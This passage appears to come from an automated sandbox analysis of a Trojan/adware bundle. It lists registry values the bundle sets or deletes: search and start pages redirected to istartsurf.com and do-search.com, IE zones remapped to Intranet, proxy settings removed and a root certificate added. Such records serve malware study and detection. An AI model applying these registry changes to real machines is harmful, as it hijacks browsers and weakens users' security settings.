"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\IHProtect]
"ptid" = "pcm"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process XTab_Setup2121.exe:3372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"(Default)" = "%Program Files%\XTab\SupTab.dll"
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\HELPDIR]
"(Default)" = "%Program Files%\XTab"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"DisplayName" = "Google"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"TopResultURL" = "http://www.bing.com/search?q={searchTerms}&src=IE-TopResult&FORM=IETR02"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0]
"(Default)" = "SupTabLib"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURL" = "http://www.bing.com/favicon.ico"
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\0\win32]
"(Default)" = "%Program Files%\XTab\SupTab.dll"
[HKLM\SOFTWARE\SupDp]
"dir" = "%Program Files%\XTab"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}]
"(Default)" = "IIETabPage"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}]
"(Default)" = "IETabPage Class"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconPath" = "%Documents and Settings%\%current user%\Local Settings\Application DataLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"
"DisplayName" = "Bing"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconURL" = "http://www.google.com/favicon.ico"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconURL" = "http://do-search.com//favicon.ico"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"
[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCR\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\Version]
"(Default)" = "1.0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconPath" = "%Documents and Settings%\%current user%\Local Settings\Application DataLow\Microsoft\Internet Explorer\Services\search_{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}.ico"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 FA 39 C5 07 09 48 4F 9E 13 1F 12 D5 EF AA 55"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"TopResultURL" = "http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}"
[HKCR\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURLFallback" = "http://www.bing.com/favicon.ico"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"DisplayName" = "e"
[HKLM\SOFTWARE\supTab]
"ptid" = "pcm"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCR\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconPath" = "%Documents and Settings%\%current user%\Local Settings\Application DataLow\Microsoft\Internet Explorer\Services\search_{E733165D-CBCF-4FDA-883E-ADEF965B476C}.ico"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process wpm_v20.0.0.1953_0302.exe:3104 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 8F 9B 36 34 E9 3F 9C 4D 42 38 F8 54 74 2E 1A"
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe:248 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 71 D9 11 3C CF 3D D2 F0 3B 77 4F 30 26 04 05"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GOSafer]
"DisplayVersion" = "1.0"
"Publisher" = "GO SAFER LLC"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GOSafer]
"UninstallString" = "%Program Files%\GOSafer\uninst.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GOSafer]
"DisplayName" = "GOSafer"
"QuietUninstallString" = "%Program Files%\GOSafer\uninst.exe"
"Comments" = "Your custom offers and deals!(qR8OYLNuOiibJ6QjgTQRjI)"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\GOSafer]
"Version" = "1.0.0"
The process net.exe:2552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 35 59 43 40 22 67 9C 33 E6 7A 8E 17 B6 E8 49"
The process net.exe:1808 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F 95 F0 C0 7F B2 9F E0 F1 B5 66 C1 6B E0 42 DF"
The process net.exe:2556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF B4 4B F8 EC 5B C0 B2 3A A9 78 81 39 25 28 3D"
The process net.exe:400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B4 40 79 76 4E 28 06 AD 7C 18 D5 D8 09 BF C5 41"
The process QQBrowser.exe:2908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B E8 C2 8B 50 D8 4A DC FE 9E 2D 1B 9D 6E 3C 05"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\B934D573F69tmp\tmp]
"RegWrite.exe" = "RegWrite"
"wpm_v20.0.0.1953_0302.exe" = "Windows SysTool Service"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\B934D573F69tmp\tmp]
"XTab_Setup2121.exe" = "XTab"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots that are not assigned to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process QQBrowser.exe:2216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\istartsurf\UninstallManager.exe -ptid=pcm"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Clients\StartMenuInternet\VMWAREHOSTOPEN.EXE\shell\open\command]
"(Default)" = "%Program Files%\VMware\VMware Tools\VMwareHostOpen.exe http://www.istartsurf.com/?type=sc&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Search Page" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"
"Default_Search_URL" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\istartsurfSoftware\istartsurfhp]
"Time" = "Type: REG_QWORD, Length: 8"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Search Page" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\istartsurf\UninstallManager.exe"
"DisplayName" = "istartsurf uninstall"
"Publisher" = "istartsurf"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Search_URL" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"
[HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe http://www.istartsurf.com/?type=sc&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "1"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\istartsurfSoftware\istartsurfhp]
"oem" = "pcm"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A 1D 52 46 A8 6D 26 87 85 1B 7A 08 0C 12 09 A6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Search]
"CustomizeSearch" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"
"SearchAssistant" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe:660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 99 B5 77 EB AC 96 F0 AA 66 D1 DE 39 8C 6E 8C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\CashReminder]
"Version" = "1.0.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"Publisher" = "Related Deals LLC"
[HKLM\SOFTWARE\CashReminder]
"affid" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"UninstallString" = "%Program Files%\CashReminder\uninstall.exe /S"
[HKLM\System\CurrentControlSet\Services\CashReminder]
"Description" = "CashReminder will remind you when you can earn a percent of your money back shopping online and related products with lower prices!"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"DisplayName" = "CashReminder"
"Comments" = "CashReminder will remind you when you can earn a percent of your money back shopping online and related products with lower prices! (Build: Vi8QYQCatMvm1PLT8H1tqpJtGKSso)"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"DisplayVersion" = "1.0.0"
"QuietUninstallString" = "%Program Files%\CashReminder\uninstall.exe /S"
The process HPNotify.exe:3664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 91 A0 A2 E4 C7 AD 39 4F 9C E0 63 ED 5E CA 69"
The process ActSys.exe:2648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 06 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "10 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\System\CurrentControlSet\Services\asfilterdrv]
"Tag" = "17"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA 40 06 25 78 53 38 7D 1F 3C 1E B9 70 4A 64 EF"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\E9C15E05782C5BADC4287A994D1DDEDB171B8B2A]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 E9 C1 5E 05"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
